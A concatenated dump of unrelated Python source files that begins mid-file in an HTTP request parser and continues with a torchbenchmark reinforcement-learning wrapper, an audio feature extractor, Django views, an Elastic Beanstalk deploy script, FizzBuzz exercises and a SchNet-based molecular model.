requestInfo.setEndpoint(rawInfoSplit[1])
request.setRequestInfo(requestInfo)
def parseHeaders(self, request): #type: (Request) -> None
requestHeaders = request.getRequestHeaders()
rawHeadersSplit = request.getRawHeaders().rstrip().split(LFN)
for rawHeader in rawHeadersSplit:
matchedKey = re.search(RequestParserService.KEY_REGEX, rawHeader)
if (not matchedKey):
continue
matchedValue = re.search(RequestParserService.VALUE_REGEX, rawHeader)
if (not matchedValue):
continue
headerKey = matchedKey.group(1)
headerValue = matchedValue.group(1).strip()
requestHeaders[headerKey] = headerValue
request.setRequestHeaders(requestHeaders)
def getRawBodyFiltered(self, request): #type: (Request) -> list[str]
rawBodyLines = request.getRawBody().split(LFN)
requestBoundary = request.getRequestBoundary()
filteredLines = []
for rawBodyLine in rawBodyLines:
if (rawBodyLine and not requestBoundary in rawBodyLine):
filteredLines.append(rawBodyLine)
return filteredLines
def addWebFile(self, rawBodyLines, lineIndex, requestArgs, requestBody):
#type: (list[str], int, RequestArgs, OrderedDict) -> None
rawBodyLine = rawBodyLines[lineIndex]
nameValue = re.search(RequestParserService.NAME_REGEX, rawBodyLine).group(1)
fileNameValue = re.search(RequestParserService.FILENAME_REGEX, rawBodyLine).group(1)
contentTypeValue = None
nextLine = rawBodyLines[lineIndex + 1]
if (CONTENT_TYPE in nextLine):
contentTypeValue = re.search(RequestParserService.VALUE_REGEX, nextLine).group(1)
webFile = (fileNameValue, open(requestArgs.postFile, RB).read(), contentTypeValue)
requestBody[nameValue] = WebFile(webFile)
def addDispositionValues(self, rawBodyLines, lineIndex, requestBody):
#type: (list[str], int, OrderedDict) -> None
rawBodyLine = rawBodyLines[lineIndex]
nameValue = re.search(RequestParserService.NAME_REGEX, rawBodyLine).group(1)
dispositionValue = EMPTY
nextIndex = lineIndex + 1
rawBodyLinesLength = len(rawBodyLines)
while (True):
dispositionValue += rawBodyLines[nextIndex] + LFN
nextLine = EMPTY
nextIndex += 1
if (nextIndex < rawBodyLinesLength):
nextLine = rawBodyLines[nextIndex]
if (nextIndex == rawBodyLinesLength or CONTENT_DISPOSITION in nextLine):
requestBody[nameValue] = dispositionValue.rstrip()
break
def parseBody(self, requestArgs, request): #type: (RequestArgs, Request) -> None
if (requestArgs.postFile or requestArgs.multiPart):
rawBodyLines = self.getRawBodyFiltered(request)
rawBodyLinesLength = len(rawBodyLines)
for lineIndex in range(rawBodyLinesLength):
rawBodyLine = rawBodyLines[lineIndex]
requestBody = request.getRequestBodyDict()
if (FILE_NAME in rawBodyLine):
self.addWebFile(rawBodyLines, lineIndex, requestArgs, requestBody)
elif (CONTENT_DISPOSITION in rawBodyLine):
self.addDispositionValues(rawBodyLines, lineIndex, requestBody)
request.setRequestBodyDict(requestBody)
if (not request.getRequestBodyDict()):
print(
"Could not parse the post file specified. Please ensure that the -pf flag is being used with"
" a proper file upload request. If the attempted request is not a file upload, then remove the -pf"
" flag to send JSON or standard form data.")
exit()
else:
request.setRequestBodyString(StringUtility.stringDoublePrefix(request.getRawBody()))
def parseFile(self, allArgs): # type: (AllArgs) -> Request
requestArgs = allArgs.getArgs(RequestArgs)
inputFile = open(allArgs.getArgs(FileArgs).getInputFile(), LR)
inptFileLines = inputFile.readlines()
request = Request()
self.setFields(request, inptFileLines)
self.parseInfo(requestArgs, request)
self.parseHeaders(request)
self.parseBody(requestArgs, request)
return request | StarcoderdataPython |
11303199 | <gh_stars>100-1000
import cv2
import torch
import random
import numpy as np
from .baseline.Renderer.model import FCN
from .baseline.DRL.evaluator import Evaluator
from .baseline.utils.util import *
from .baseline.DRL.ddpg import DDPG
from .baseline.DRL.multi import fastenv
from ...util.model import BenchmarkModel
from torchbenchmark.tasks import REINFORCEMENT_LEARNING
from argparse import Namespace
torch.manual_seed(1337)
np.random.seed(1337)
torch.backends.cudnn.deterministic = False
torch.backends.cudnn.benchmark = True
class Model(BenchmarkModel):
task = REINFORCEMENT_LEARNING.OTHER_RL
def __init__(self, device=None, jit=False, train_bs=96, eval_bs=96):
super(Model, self).__init__()
self.device = device
self.jit = jit
# Train: These options are from source code.
# Source: https://arxiv.org/pdf/1903.04411.pdf
# Code: https://github.com/megvii-research/ICCV2019-LearningToPaint/blob/master/baseline/train.py
self.args = Namespace(**{
'validate_episodes': 5,
'validate_interval': 50,
'max_step': 40,
'discount': 0.95**5,
'episode_train_times': 10,
'noise_factor': 0.0,
'tau': 0.001,
'rmsize': 800,
})
self.train_bs = train_bs
self.eval_bs = eval_bs
# Train: input images are from CelebFaces and resized to 128 x 128.
# Create 2000 random tensors for input, but randomly sample 200,000 images.
self.width = 128
self.image_examples = torch.rand(2000, 3, self.width, self.width)
# LearningToPaint includes actor, critic, and discriminator models.
self.Decoder = FCN()
self.train_env = fastenv(max_episode_length=self.args.max_step, env_batch=self.train_bs,
images=self.image_examples, device=self.device, Decoder=self.Decoder)
self.train_agent = DDPG(batch_size=self.train_bs, env_batch=self.train_bs,
max_step=self.args.max_step, tau=self.args.tau, discount=self.args.discount,
rmsize=self.args.rmsize, device=self.device, Decoder=self.Decoder)
self.train_evaluate = Evaluator(args=self.args, env_batch=train_bs, writer=None)
self.train_agent.train()
self.infer_env = fastenv(max_episode_length=self.args.max_step, env_batch=self.eval_bs,
images=self.image_examples, device=self.device, Decoder=self.Decoder)
self.infer_agent = DDPG(batch_size=self.eval_bs, env_batch=self.eval_bs,
max_step=self.args.max_step, tau=self.args.tau, discount=self.args.discount,
rmsize=self.args.rmsize, device=self.device, Decoder=self.Decoder)
self.infer_evaluate = Evaluator(args=self.args, env_batch=eval_bs, writer=None)
self.infer_agent.eval()
self.step = 0
self.train_observation = self.train_env.reset()
self.infer_observation = self.infer_env.reset()
self.train_agent.reset(self.train_observation, self.args.noise_factor)
self.infer_agent.reset(self.infer_observation, self.args.noise_factor)
def get_module(self):
action = self.train_agent.select_action(self.train_observation, noise_factor=self.args.noise_factor)
self.train_observation, reward, done, _ = self.train_env.step(action)
self.train_agent.observe(reward, self.train_observation, done, self.step)
state, action, reward, \
next_state, terminal = self.train_agent.memory.sample_batch(self.train_bs, self.device)
state = torch.cat((state[:, :6].float() / 255, state[:, 6:7].float() / self.args.max_step,
self.train_agent.coord.expand(state.shape[0], 2, 128, 128)), 1)
return self.train_agent.actor, (state, )
def train(self, niter=1):
if self.jit:
raise NotImplementedError()
episode = episode_steps = 0
for _ in range(niter):
episode_steps += 1
if self.train_observation is None:
self.train_observation = self.train_env.reset()
self.train_agent.reset(self.train_observation, self.args.noise_factor)
action = self.train_agent.select_action(self.train_observation, noise_factor=self.args.noise_factor)
self.train_observation, reward, done, _ = self.train_env.step(action)
self.train_agent.observe(reward, self.train_observation, done, self.step)
if (episode_steps >= self.args.max_step and self.args.max_step):
# [optional] evaluate
if episode > 0 and self.args.validate_interval > 0 and \
episode % self.args.validate_interval == 0:
reward, dist = self.train_evaluate(self.train_env, self.train_agent.select_action)
tot_Q = 0.
tot_value_loss = 0.
lr = (3e-4, 1e-3)
for i in range(self.args.episode_train_times):
Q, value_loss = self.train_agent.update_policy(lr)
tot_Q += Q.data.cpu().numpy()
tot_value_loss += value_loss.data.cpu().numpy()
# reset
self.train_observation = None
episode_steps = 0
episode += 1
self.step += 1
def eval(self, niter=1):
if self.jit:
raise NotImplementedError()
for _ in range(niter):
reward, dist = self.infer_evaluate(self.infer_env, self.infer_agent.select_action)
# Using separate models for train and infer, so skip this function.
def _set_mode(self, train):
pass
if __name__ == '__main__':
m = Model(device='cpu', jit=False)
module, example_inputs = m.get_module()
while m.step < 100:
m.train(niter=1)
if m.step % 100 == 0:
m.eval(niter=1)
m.step += 1
| StarcoderdataPython |
67661 | <reponame>lcn-kul/conferencing-speech-2022<filename>src/data/extract_features/extract_features.py
import csv
import librosa
import numpy as np
from pathlib import Path
import soundfile as sf
import torch
from torchaudio.transforms import ComputeDeltas, MFCC
from transformers import Wav2Vec2FeatureExtractor, Wav2Vec2Model, AutoModel
from tqdm.auto import tqdm
from src import constants
from src.utils.run_once import run_once
from src.utils.split import Split, ALL_SPLITS, DEV_SPLITS
from src.utils.csv_info import STANDARDIZED_CSV_INFO
from src.utils.full_path import full_path
def _decode_non_mp3_file_like(file, new_sr):
# Source:
# https://huggingface.co/docs/datasets/_modules/datasets/features/audio.html#Audio
array, sampling_rate = sf.read(file)
array = array.T
array = librosa.to_mono(array)
if new_sr and new_sr != sampling_rate:
array = librosa.resample(
array,
orig_sr=sampling_rate,
target_sr=new_sr,
res_type="kaiser_best"
)
sampling_rate = new_sr
return array, sampling_rate
def _extraction_progress_path(split: Split, example: bool, partition_idx: int, num_partitions: int) -> Path:
split_name = str(split).lower().split(".")[1]
example_name = "_example" if example else ""
if num_partitions == 1:
partition_name = ""
else:
partition_name = f"_{partition_idx}-{num_partitions}"
progress_file_name = f"extract_features_progress_{split_name}{example_name}{partition_name}"
return constants.DIR_DATA_FLAGS.joinpath(progress_file_name)
def _get_extraction_progress(split: Split, example: bool, partition_idx: int, num_partitions: int) -> int:
"""Returns the most recent finished index. If no progress."""
path = _extraction_progress_path(
split, example, partition_idx, num_partitions)
if path.exists():
with open(path, mode="r", encoding="utf8") as f:
finished_idx = int(f.readline())
return finished_idx
else:
return -1
def _write_extraction_progress(split: Split, example: bool, partition_idx: int, num_partitions: int, finished_idx: int):
path = _extraction_progress_path(
split, example, partition_idx, num_partitions)
with open(path, mode='w', encoding="utf8") as f:
f.write(str(finished_idx))
def _extract_features(split: Split, example: bool, partition_idx: int = 0, num_partitions: int = 1):
# Returns a constants.DatasetDir containing information about the dataset.
dataset = constants.get_dataset(split, example)
# Load progress for this partition and for the single partition.
finished_idx = _get_extraction_progress(
split, example, partition_idx, num_partitions)
single_idx = _get_extraction_progress(split, example, 0, 1)
# For printing...
split_name = str(split).lower().split(".")[1]
example_str = "(example) " if example else ""
print(f"{example_str}Extracting features for {split_name} set.")
# MODEL REQUIRES 16 kHz SAMPLING RATE.
SAMPLING_RATE = 16_000
# Device for model computations.
if torch.cuda.is_available():
device = "cuda"
else:
device = "cpu"
print(f"{example_str}Using: %s" % device)
# Create model.
print(f"{example_str}Loading model...")
feature_extractor = Wav2Vec2FeatureExtractor(
feature_size=1,
sampling_rate=SAMPLING_RATE,
padding_value=0.0,
do_normalize=True,
return_attention_mask=True
)
if constants.XLSR_DIR.exists():
model = AutoModel.from_pretrained(str(constants.XLSR_DIR))
else:
model = Wav2Vec2Model.from_pretrained(f"facebook/{constants.XLSR_NAME}")
model = model.to(device)
# Create MFCC calculator.
print(f"{example_str}Creating MFCC components...")
calculate_mfcc = MFCC(sample_rate=SAMPLING_RATE)
# Create MFCC Delta calculator.
compute_deltas = ComputeDeltas(win_length=5, mode='replicate')
# Load CSV rows.
rows = []
with open(dataset.csv_path, encoding="utf8", mode="r") as in_csv:
csv_reader = csv.reader(in_csv)
for idx, row in enumerate(csv_reader):
# Skip header row & empty rows.
if idx == 0 or len(row) == 0:
continue
# Append row.
rows.append(row)
# Which rows should be processed by the partition.
if single_idx == -1:
partition_start = int(partition_idx/num_partitions * len(rows))
partition_end = int((partition_idx+1)/num_partitions * len(rows))
else:
new_len = len(rows) - (single_idx+1)
partition_start = int(partition_idx/num_partitions * new_len)
partition_start += single_idx+1
partition_end = int((partition_idx+1)/num_partitions * new_len)
partition_end += single_idx+1
print(f"Processing sample {partition_start}..{partition_end-1}")
# ======================================================================= #
# CALCULATE FEATURES #
# ======================================================================= #
print(f"{example_str}Calculating features for {len(rows)} audio files...")
write_progress_freq = 10
for idx, row in enumerate(tqdm(rows)):
# Skip indices that are not for this partition.
if idx < partition_start:
continue
if idx >= partition_end:
continue
# These have already been completed.
if idx <= finished_idx:
continue
# Extract paths.
audio_path = row[STANDARDIZED_CSV_INFO.col_audio_path]
mfcc_path = row[STANDARDIZED_CSV_INFO.col_mfcc_path]
mfcc_ext_path = row[STANDARDIZED_CSV_INFO.col_mfcc_ext_path]
xlsr_path = row[STANDARDIZED_CSV_INFO.col_xlsr_path]
# Load audio.
audio_data_np, _ = _decode_non_mp3_file_like(
full_path(audio_path), SAMPLING_RATE)
audio_data_np = np.float32(audio_data_np)
audio_data_pt = torch.from_numpy(audio_data_np)
# Calculate wav2vec2 vector.
inputs = feature_extractor(
audio_data_pt,
sampling_rate=SAMPLING_RATE,
return_tensors="pt"
)
input = inputs["input_values"].to(device)
with torch.no_grad():
output = model(input)
xlsr: torch.Tensor = output.last_hidden_state.squeeze().cpu()
# MFCC (and deltas)
mfcc: torch.Tensor = calculate_mfcc(audio_data_pt)
mfcc_d: torch.Tensor = compute_deltas(mfcc)
mfcc_d2: torch.Tensor = compute_deltas(mfcc_d)
mfcc_ext = torch.concat((mfcc, mfcc_d, mfcc_d2))
# Transpose MFCC from (n_mfcc, T) to (T, n_mfcc).
# This will match the wav2vec2 size of (T, 1024).
mfcc = mfcc.permute((1, 0))
mfcc_ext = mfcc_ext.permute((1, 0))
# Save results to .pt files.
torch.save(mfcc, full_path(mfcc_path))
torch.save(mfcc_ext, full_path(mfcc_ext_path))
torch.save(xlsr, full_path(xlsr_path))
# Finished this index.
if idx % write_progress_freq == write_progress_freq - 1:
_write_extraction_progress(
split, example, partition_idx, num_partitions, idx)
print("")
print(f"{example_str}Finished.")
def extract_features(split: Split, example: bool, partition_idx: int = 0, num_partitions: int = 1):
# Flag name. Make sure this operation is only performed once.
split_name = str(split).lower().split(".")[1]
example_name = "_example" if example else ""
example_str = "(example) " if example else ""
flag_name = f"extracted_features_{split_name}{example_name}"
# Special case: subset uses features from main datasets, otherwise
# we would have to extract the features twice.
if split == Split.TRAIN_SUBSET or split == Split.VAL_SUBSET:
print(f"{example_str}Feature extraction not needed for {split_name} split.")
return
# Run exactly once.
with run_once(flag_name, partition_idx, num_partitions) as should_run:
if should_run:
_extract_features(split, example, partition_idx, num_partitions)
else:
print(f"{example_str}Features already extracted for {split_name} split.")
if __name__ == "__main__":
example: bool = True
for split in DEV_SPLITS:
extract_features(split, example, partition_idx=0, num_partitions=1)
| StarcoderdataPython |
8068893 | from django.contrib import admin
from .models import StudentDataDropout
# Register your models here.
admin.site.register(StudentDataDropout) | StarcoderdataPython |
11253558 | <gh_stars>0
"""Tests for filewriter.py
"""
| StarcoderdataPython |
9699196 | <filename>eb_deployer/eb_deployer.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This is the eb deploy application for manheim hello world app
from progress.spinner import Spinner
from subprocess import Popen, PIPE
import boto3
import os
import os.path
import time
client = boto3.client('elasticbeanstalk')
current_directory = os.getcwd() # used as app name and environment
git_directory = os.path.join(current_directory, '.git')
eb_directory = os.path.join(current_directory, '.elasticbeanstalk')
app_name = current_directory.split('/')[-1]
environment_name = (app_name.replace('_', '-'))
solution_stack = '64bit Amazon Linux 2016.03 v2.1.3 running Python 2.7'
application_path = current_directory + '/application.py'
# test if there is a .git folder; if not, then there is no repo, so exit
if not os.path.exists(git_directory):
print("\n==>Cannot create Elastic Beanstalk app.")
print("==>Run 'git init' first, then tag a branch.")
exit(1)
def get_latest_tag():
"""check for latest tag and store it for app version number"""
p = Popen('git describe --tags --candidates 1',
shell=True, stdin=PIPE, stdout=PIPE)
latest_tag = p.communicate()
if len(latest_tag) is not 2 and latest_tag[1] is not None:
print("\n==>Error retrieving latest tag: {}\n".format(latest_tag[1]))
return None
return latest_tag[0].strip()
def create_eb_environment():
"""
Create an environment for the application.
This is where the scaling options are set (up to 3 instances),
based on CPU utilization.
"""
creation_response = client.create_environment(
ApplicationName=app_name,
EnvironmentName=environment_name,
Description="Manheim test deployment",
CNAMEPrefix=environment_name,
Tier={
'Name': 'WebServer',
'Type': 'Standard'
},
SolutionStackName=solution_stack,
OptionSettings=[
{
'Namespace': 'aws:autoscaling:asg',
'OptionName': 'Custom Availability Zones',
'ResourceName': 'AWSEBAutoScalingGroup',
'Value': 'us-east-1a'
},
{
'Namespace': 'aws:autoscaling:asg',
'OptionName': 'MaxSize',
'ResourceName': 'AWSEBAutoScalingGroup',
'Value': '3'
},
{
'Namespace': 'aws:autoscaling:asg',
'OptionName': 'MinSize',
'ResourceName': 'AWSEBAutoScalingGroup',
'Value': '1'
},
{
'Namespace': 'aws:autoscaling:launchconfiguration',
'OptionName': 'InstanceType',
'Value': 't2.micro'
},
{
'Namespace': 'aws:autoscaling:trigger',
'OptionName': 'BreachDuration',
'ResourceName': 'AWSEBCloudwatchAlarmLow',
'Value': '1'
},
{
u'Namespace': 'aws:autoscaling:trigger',
u'OptionName': 'EvaluationPeriods',
u'ResourceName': 'AWSEBCloudwatchAlarmLow',
u'Value': '1'
},
{
u'Namespace': 'aws:autoscaling:trigger',
u'OptionName': 'LowerBreachScaleIncrement',
u'ResourceName': 'AWSEBAutoScalingScaleDownPolicy',
u'Value': '-1'
},
{
u'Namespace': 'aws:autoscaling:trigger',
u'OptionName': 'LowerThreshold',
u'ResourceName': 'AWSEBCloudwatchAlarmLow',
u'Value': '25'
},
{
'Namespace': 'aws:autoscaling:trigger',
'OptionName': 'MeasureName',
'ResourceName': 'AWSEBCloudwatchAlarmLow',
'Value': 'CPUUtilization'
},
{
'Namespace': 'aws:autoscaling:trigger',
'OptionName': 'Period',
'ResourceName': 'AWSEBCloudwatchAlarmLow',
'Value': '1'
},
{
'Namespace': 'aws:autoscaling:trigger',
'OptionName': 'Statistic',
'ResourceName': 'AWSEBCloudwatchAlarmLow',
'Value': 'Average'
},
{
'Namespace': 'aws:autoscaling:trigger',
'OptionName': 'Unit',
'ResourceName': 'AWSEBCloudwatchAlarmLow',
'Value': 'Percent'
},
{
'Namespace': 'aws:autoscaling:trigger',
'OptionName': 'UpperBreachScaleIncrement',
'ResourceName': 'AWSEBAutoScalingScaleUpPolicy',
'Value': '1'
},
{
'Namespace': 'aws:autoscaling:trigger',
'OptionName': 'UpperThreshold',
'ResourceName': 'AWSEBCloudwatchAlarmHigh',
'Value': '85'
},
{
'Namespace': 'aws:autoscaling:updatepolicy:rollingupdate',
'OptionName': 'RollingUpdateEnabled',
'ResourceName': 'AWSEBAutoScalingGroup',
'Value': 'false'
},
{
'Namespace': 'aws:autoscaling:updatepolicy:rollingupdate',
'OptionName': 'RollingUpdateType',
'ResourceName': 'AWSEBAutoScalingGroup',
'Value': 'Time'
},
{
'Namespace': 'aws:elasticbeanstalk:command',
'OptionName': 'BatchSize',
'Value': '50'
},
{
'Namespace': 'aws:elasticbeanstalk:command',
'OptionName': 'BatchSizeType',
'Value': 'Percentage'
},
{
'Namespace': 'aws:elasticbeanstalk:command',
'OptionName': 'DeploymentPolicy',
'Value': 'Rolling'
},
{
'Namespace': 'aws:elasticbeanstalk:command',
'OptionName': 'IgnoreHealthCheck',
'Value': 'false'
},
{
'Namespace': 'aws:elasticbeanstalk:command',
'OptionName': 'Timeout',
'Value': '600'
},
{
'Namespace': 'aws:elasticbeanstalk:container:python',
'OptionName': 'WSGIPath',
'Value': application_path
}
]
)
return creation_response
def initialize_app():
"""This function initializes the current directory for Elastic Beanstalk"""
print("Initializing app (current directory) for Elastic Beanstalk...")
proc = Popen('eb init --region="us-east-1" -p python {}'.format(app_name),
shell=True, stdin=PIPE, stdout=PIPE)
resp, err = proc.communicate()
if err is not None:
print("\n==>Error initializing app {}.\n==>{}\n".format(app_name, err))
exit(1)
print("Done.")
def deploy_app():
"""This function deploys the current directory
to the Elastic Beanstalk environment
"""
print("Deploying app (current directory) to Elastic Beanstalk...")
proc = Popen('eb deploy --label {} {}'.format(
get_latest_tag(), environment_name),
shell=True, stdin=PIPE, stdout=PIPE)
resp, err = proc.communicate()
if err is not None:
print("\n==>Error deploying app {} to environment {}.\n==>{}\n".format(
app_name, environment_name, err))
exit(1)
print(resp)
print("Done.")
def main():
if not os.path.exists(eb_directory):
initialize_app()
else:
print("Directory already initialized for Elastic Beanstalk. Skipping.")
# check if environment has already been created. If so, skip creation
response = client.describe_environments(
EnvironmentNames=[
environment_name,
]
)
if len(response['Environments']) == 0:
print('==> Creating environment {}'.format(environment_name))
create_eb_environment()
# wait for environment ready state before deploying
environment_ready = False
while not environment_ready:
response = client.describe_environments(
EnvironmentNames=[
environment_name,
]
)
if len(response['Environments']) == 0:
print("Environment {} does not exist.".format(environment_name))
exit(1)
env_status = response['Environments'][0]['Status']
if env_status == 'Terminated':
print('\n==>Environment is in terminated state. \
It could be visible up to an hour.\n')
exit(1)
if env_status != 'Ready':
spinner = Spinner("Environment setup still in progress... ")
for i in range(20):
spinner.next()
time.sleep(1)
else:
environment_ready = True
print("Environment ready.")
deploy_app()
if __name__ == '__main__':
main()
| StarcoderdataPython |
12844959 | <filename>tripled/stack/node.py
__author__ = 'baohua'
from subprocess import PIPE, Popen
from tripled.common.constants import NODE_ROLES
class Node(object):
"""
An instance of the server in the stack.
"""
def __init__(self, ip, role):
self.ip = ip
self.role = NODE_ROLES.get(role, NODE_ROLES['compute'])
def is_reachable(self, dst):
"""
Return whether the dst is reachable from the node.
>>> Node().is_reachable(Node('127.0.0.1'))
True
>>> Node().is_reachable(Node('169.254.254.254'))
False
"""
cmd = 'ping %s -c 3 -W 2' % dst.ip
output, error = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True).communicate()
if not error and output and '0% packet loss' in output:
return True
else:
return False
class Control(Node):
"""
An instance of the control node in the stack.
"""
def __init__(self, ip='127.0.0.1'):
super(Control, self).__init__(ip, role='control')
class Network(Node):
"""
An instance of the control node in the stack.
"""
def __init__(self, ip='127.0.0.1'):
super(Network, self).__init__(ip, role='network')
class Compute(Node):
"""
An instance of the control node in the stack.
"""
def __init__(self, ip='127.0.0.1'):
super(Compute, self).__init__(ip, role='compute')
if __name__ == '__main__':
import doctest
doctest.testmod()
| StarcoderdataPython |
1770963 | from django.shortcuts import render
from django.shortcuts import render, redirect
from services.models import Service
from rest_framework.views import APIView
from django.http import JsonResponse
# Create your views here.
class AllServicesAPI(APIView):
def get(self, request, *args, **kwargs):
services = list(Service.objects.values())
return JsonResponse({'services': services})
class ServiceHandlerAPI(APIView):
def post(self, request, *args, **kwargs):
# link = kwargs.get('link')
# user = request.GET.get('user')
service = list(Service.objects.values())
return JsonResponse({'service': service})
# class CurrentUserView(APIView):
# def get(self, request):
# serializer = UserSerializer(request.user)
# return JsonResponse(serializer.data)
| StarcoderdataPython |
9696098 | <filename>src/service_framework/connections/__init__.py
""" Something whitty """
| StarcoderdataPython |
118744 | import string
class StringSplitter:
def __init__(self, text):
self.string = text.lower()
self.string_list = []
self.bad = set()
for punct in string.punctuation:
if punct != "'" or punct != "-":
self.bad.add(punct)
for num in '1234567890':
self.bad.add(num)
def string_splitter(self, words_a_string):
clean = self._strip_bad_chars()
words = clean.split(' ')
count = 0
big_string = ''
for i in range(len(words)):
if count == words_a_string - 1:
count = 0
big_string += words[i]
self.string_list.append(big_string)
big_string = ''
else:
big_string += words[i] + " "
count += 1
def _strip_bad_chars(self):
clean_string = ''
for index in range(len(self.string)):
if self.string[index] not in self.bad:
clean_string += self.string[index]
return clean_string
def show_list(self):
return self.string_list
if __name__ == "__main__":
s = StringSplitter('Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed accumsan libero neque, nec viverra quam egestas in. Vivamus id egestas mauris, eu commodo arcu. Curabitur est eros, blandit quis nulla sed, viverra sodales risus. Sed in tellus porta, volutpat est ut, ullamcorper purus. Praesent tincidunt erat at dapibus aliquet. Maecenas et convallis lorem, vitae ultricies metus. Ut at quam ultrices, gravida mi non, vehicula urna. Quisque aliquet facilisis ligula, ut vestibulum dolor rhoncus sed. Quisque interdum lacus ut vulputate venenatis. In non turpis leo. Aenean id semper tortor, id rutrum neque. Fusce posuere, tortor non tristique luctus, velit turpis molestie augue, non eleifend sem tortor sed odio. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Donec quis erat in odio vulputate fringilla eget eu velit. Etiam eleifend dui est, porta commodo dui mollis vel.')
s.string_splitter(10)
print(s.show_list())
| StarcoderdataPython |
3386944 | <reponame>banerjeesujan/leetcode<filename>Interviewbit/MyMath/IB_Math_FizzBuzz.py<gh_stars>0
import time
class Solution:
# @param A : integer
# @return a list of strings Fizz Buzz FizzBuzz
def fizzBuzz(self, A):
retArray = list()
for i in range(1, A + 1):
if i % 3 == 0 and i % 5 == 0:
retArray.append('FizzBuzz')
elif i % 3 == 0:
retArray.append('Fizz')
elif i % 5 == 0:
retArray.append('Buzz')
else:
retArray.append(str(i))
return retArray
def fizzBuzz2(self, A):
resArray = list()
retArray = [0] * (A + 1)
for i in range(3, A + 1, 3):
retArray[i] += 3
for i in range(5, A + 1, 5):
retArray[i] += 5
for i in range(1, A + 1):
if retArray[i] == 0:
resArray.append(str(i))
elif retArray[i] == 3:
resArray.append('Fizz')
elif retArray[i] == 5:
resArray.append('Buzz')
else:
resArray.append('FizzBuzz')
return resArray
def fizzBuzz3(self, A):
retlist = [str(x) for x in range(1, A + 1)]
for i in range(3, A + 1, 3):
retlist[i - 1] = 'Fizz'
for j in range(5, A + 1, 5):
retlist[j - 1] = 'Buzz'
for k in range(15, A + 1, 15):
retlist[k - 1] = 'FizzBuzz'
return retlist
start_time = time.perf_counter()
A = 500000
s = Solution()
print(s.fizzBuzz3(A))
end_time = time.perf_counter()
print(end_time - start_time) # 0.054255205 # 0.05325494
| StarcoderdataPython |
124700 | <reponame>semodi/champs-scalar-coupling<gh_stars>0
import schnetpack as spk
from schnetpack.data import Structure
import torch
from torch import nn
import numpy as np
import schnetpack
class EdgeUpdate(nn.Module):
def __init__(self, n_atom_basis, n_spatial_basis):
super(EdgeUpdate, self).__init__()
self.dense1 = spk.nn.base.Dense(2 * n_atom_basis + n_spatial_basis,
n_atom_basis + n_spatial_basis,activation = spk.nn.activations.shifted_softplus)
self.dense2 = spk.nn.base.Dense(n_atom_basis + n_spatial_basis,
n_spatial_basis, activation = spk.nn.activations.shifted_softplus)
self.update_network = nn.Sequential(self.dense1, self.dense2)
def forward(self, x, neighbors, f_ij):
# # calculate filter
# W = self.filter_network(f_ij)
# # apply optional cutoff
# if self.cutoff_network is not None:
# C = self.cutoff_network(r_ij)
# # print(C)
# W *= C
nbh_size = neighbors.size()
nbh = neighbors.view(-1, nbh_size[1] * nbh_size[2], 1)
nbh = nbh.expand(-1, -1, x.size(2))
x_gath = torch.gather(x, 1, nbh)
x_gath = x_gath.view(nbh_size[0], nbh_size[1], nbh_size[2], -1)
x_gath0 = torch.unsqueeze(x, 2).expand(-1,-1, nbh_size[2], -1).clone()
f_ij = torch.cat([f_ij, x_gath, x_gath0], dim = -1)
f_ij = self.update_network(f_ij)
return f_ij
class ShrinkSchNet(spk.representation.SchNet):
def __init__(self, n_atom_basis=128, n_filters=128, n_interactions=1, cutoff=5.0, n_gaussians=25,
normalize_filter=False, coupled_interactions=False,
return_intermediate=False, max_z=100, interaction_block=spk.representation.SchNetInteraction,
edgeupdate_block = EdgeUpdate, trainable_gaussians=False,
distance_expansion=None, shrink_layers = 3, shrink_distances = None):
n_interactions += shrink_layers
if shrink_distances:
self.shrink_layers = len(shrink_distances)
else:
self.shrink_layers = shrink_layers
self.shrink_distances = shrink_distances
super(ShrinkSchNet, self).__init__(n_atom_basis, n_filters, n_interactions, cutoff, n_gaussians,
normalize_filter, coupled_interactions,
return_intermediate, max_z, interaction_block, trainable_gaussians,
distance_expansion)
if edgeupdate_block == None:
self.edge_update = False
self.edgeupdates = [None] * n_interactions
else:
self.edge_update = True
if coupled_interactions:
self.edgeupdates = nn.ModuleList([
edgeupdate_block(n_atom_basis=n_atom_basis,
n_spatial_basis=n_gaussians)
] * n_interactions)
else:
self.edgeupdates = nn.ModuleList([
edgeupdate_block(n_atom_basis=n_atom_basis, n_spatial_basis=n_gaussians)
for _ in range(n_interactions)
])
def forward(self, inputs):
atomic_numbers = inputs[Structure.Z]
positions = inputs[Structure.R]
cell = inputs[Structure.cell]
cell_offset = inputs[Structure.cell_offset]
neighbors = inputs[Structure.neighbors]
neighbor_mask = inputs[Structure.neighbor_mask]
atom_mask = inputs[Structure.atom_mask]
# atom embedding
x = self.embedding(atomic_numbers)
# spatial features
r_ij = self.distances(positions, neighbors, cell, cell_offset)
f_ij = self.distance_expansion(r_ij)
nodiagmask = torch.stack([~torch.eye(atom_mask.size()[1]).byte()]*len(atom_mask))
atom_mask_mat = \
torch.einsum('ij,ik -> ijk', atom_mask, atom_mask)[nodiagmask].view(len(atom_mask),atom_mask.size()[1],-1)
zero_mask = torch.zeros_like(r_ij)
if self.return_intermediate:
xs = [x]
for eupdate, interaction in zip(self.edgeupdates[:-self.shrink_layers],
self.interactions[:-self.shrink_layers]):
if self.edge_update:
f_ij = eupdate(x, neighbors, f_ij)
f_ij = f_ij * neighbor_mask.unsqueeze(-1).expand(-1,-1,-1, f_ij.size()[-1])
v = interaction(x, r_ij, neighbors, neighbor_mask, f_ij=f_ij)
x = x + v
if self.return_intermediate:
xs.append(xs)
for eupdate, interaction, co_dist in zip(self.edgeupdates[-self.shrink_layers:],
self.interactions[-self.shrink_layers:],
self.shrink_distances):
if self.edge_update:
f_ij = eupdate(x, neighbors, f_ij)
f_ij = f_ij * neighbor_mask.unsqueeze(-1).expand(-1,-1,-1, f_ij.size()[-1])
neighbor_mask = torch.where(r_ij - (10 * atom_mask_mat) < co_dist, neighbor_mask, zero_mask)
v = interaction(x, r_ij, neighbors, neighbor_mask, f_ij=f_ij)
x = x + v
if self.return_intermediate:
xs.append(xs)
if self.return_intermediate:
return x, xs
return x[atom_mask.byte()].view(len(atom_mask),2,-1)
class SCReadout(nn.Module):
def __init__(self, embed_dim = 128, hidden_dim = 128, mlp_layers = 3, mean=None, stddev=None):
super(SCReadout, self).__init__()
self.embed_dim = embed_dim
self.gru = nn.GRU(input_size=embed_dim,
hidden_size=hidden_dim,
batch_first = True)
